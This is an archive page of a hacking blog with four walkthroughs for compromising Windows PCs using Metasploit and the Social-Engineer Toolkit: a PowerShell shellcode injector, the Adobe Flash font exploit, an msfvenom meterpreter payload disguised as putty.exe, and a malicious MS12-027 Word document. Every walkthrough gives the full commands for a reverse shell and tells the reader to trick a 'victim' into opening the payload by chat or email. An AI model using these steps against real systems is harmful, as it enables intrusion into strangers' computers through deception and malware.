Archive for August, 2012

Hack Windows7 PC using Powershell Attack Vector in Social Engineering Toolkit (Bypassing Antivirus)

22
9 months ago
by Raj Chandel in , ,

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by

Preventative Technologies.

  • Powershell Alphanumeric Shellcode Injector
  • Powershell Reverse Shell
  • Powershell Bind Shell
  • Powershell Dump SAM Database

Open your backtrack terminal & Type cd /pentest/exploits/set

Now Open Social Engineering Toolkit (SET). /set

Now choose 1, “Social-Engineering Attacks

Now choose 10, “Powershell Attack Vector

Now choose 1, “Powershell Alphanumeric Shellcode Injector” and type IP address of Your PC for Reverse Connection.

Now create the exploit code for 32 and 64 bit Windows:

Now is retrieve the Powershell code that SET created. The code is saved in /pentest/exploits/set/reports/powershell/x64_powershell_injection.txt

Now send your x64_powershell_injection.txt files to victim via chat or email or any social engineering technique and convene the victim to open x64_powershell_injection.txt and Paste it into a Windows 7 command prompt

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Attacking on Remote PC using Adobe Flash Player 11.3 Font Parsing Code Execution

0
9 months ago
by Raj Chandel in ,

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.

Exploit Targets

Adobe Flash Player before 11.3.300.271.

Internet Explorer 6 on XP SP2

Internet Explorer 7 on XP SP2

Internet Explorer 8 on XP SP2

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP SP 2

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/adobe_flash_otf_font

msf exploit (adobe_flash_otf_font)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_otf_font)>set lhost 192.168.1.4 (IP of Local Host)

msf exploit (adobe_flash_otf_font)>set srvhost 192.168.1.4 (This must be an address on the local machine)

msf exploit (adobe_flash_otf_font)>set uripath flashplayerupdates (The Url to use for this exploit)

msf exploit (adobe_flash_otf_font)>exploit

Now an URL you should give to your victim http://192.168.1.4:8080/flashplayerupdates

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Hack Remote Windows 7 PC Easy Way (Msfvenom Tutorial)

0
9 months ago
by Raj Chandel in ,

Msfvenom is a combination of Msfpayload and msfencode, putting both of these tools into a single framework instance. The advantages of msfvenom are:

  • One single tool
  • Standardized command line options
  • Increased speed

Open your terminal and type msfvenom –h Msfvenom has a wide range of options available

Now type

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai –I 5 –b ‘x00’ lhost= 192.168.1.3 lport= 4444 –f exe > putty.exe

-p for payload Windows/meterpreter/reverse_tcp
-e encoder that you want to use x86/shikata_ga_nai
Lhost (IP address of your local host) 192.168.1.3
Lport (Port of your local pc) 4444
-i 5-b ‘x00 Remove for bad character
-f format Output format

Now we successfully generate the malicious exe File, it will stored on your local computer

/root/putty.exe

Now open your backtrack terminal and type msfconsole

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your putty.exe files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

 

Hack Remote Windows PC using Microsoft Office word MS12-027 MSCOMCTL ActiveX Buffer Overflow

0
9 months ago
by Raj Chandel in ,

This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses “msgr3en.dll”, which will load after office got load, so the malicious file must be loaded through “File / Open” to achieve exploitation.

Exploit Targets

MS office 2007 on windows XP SP 2, 3

MS office 2010 on windows 7/SP1

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/ms12_027_mscomctl_bof

msf exploit (ms12_027_mscomctl_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms12_027_mscomctl_bof)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (ms12_027_mscomctl_bof)>exploit

After we successfully generate the malicious doc File, it will stored on your local computer

/root/.msf4/local/msf.doc

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your msf.doc files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Go to Top